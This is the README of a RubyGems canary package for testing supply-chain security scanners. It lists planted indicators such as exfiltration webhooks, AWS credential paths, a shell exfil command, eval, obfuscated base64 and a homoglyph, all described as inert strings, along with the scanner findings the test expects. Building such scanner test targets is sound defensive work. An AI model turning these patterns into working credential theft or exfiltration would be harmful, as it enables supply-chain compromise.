commissar-canary
This gem contains obvious indicators of supply chain compromise patterns to test against security scanners to test. No malicious code executes. Not for production use.
Originally built to validate Commissar detections and provide a shared test target for other RubyGems security scanners. Feel free to use it as much as you need, and share with me your findings or improvements!
What it contains
Every indicator is a string constant. No code executes on install or require.
| Indicator | Category | Notes |
|---|---|---|
| Telegram bot URL | Suspicious URL | Burned token |
| Discord webhook URL | Suspicious URL | Expired |
| ETH wallet address | Web3 | Lazarus Group / Ronin Bridge hack, OFAC SDN April 2022 |
| BTC wallet address | Web3 | WannaCry ransomware, DOJ indictment 2018 |
| eval call | Dangerous function | Static safe string |
| AWS credential access | Credentials | Static string, no real key |
| AWS credentials path | Credentials | Static string |
| Shell exfil command | Shell/Exfil | Static string |
| Base64 high-entropy string | Encoding | Decodes to inert message |
| Line > 500 characters | Encoding | Repeated inert string |
| Cyrillic homoglyph | Encoding | U+0430 substituting Latin 'a' |
| Native extension reference | Gemspec | Commented out, does not execute |
| post_install_message`_ with URL | Gemspec | Points to this repo |
Usage
Run Commissar against it:
commissar commissar-canary
Or locally if you want:
commissar --local commissar-canary-0.1.0.gem
Expected output: multiple HIGH and MED findings across all categories, risk score ≥ 85.
What it is not
- Does not phone home.
- Does not execute shell commands.
- Does not access credentials or the filesystem.
- Does not compile native extensions.
- Wallet addresses and tokens are burned forensic references from public law enforcement records.
License
MIT — Mauro Eldritch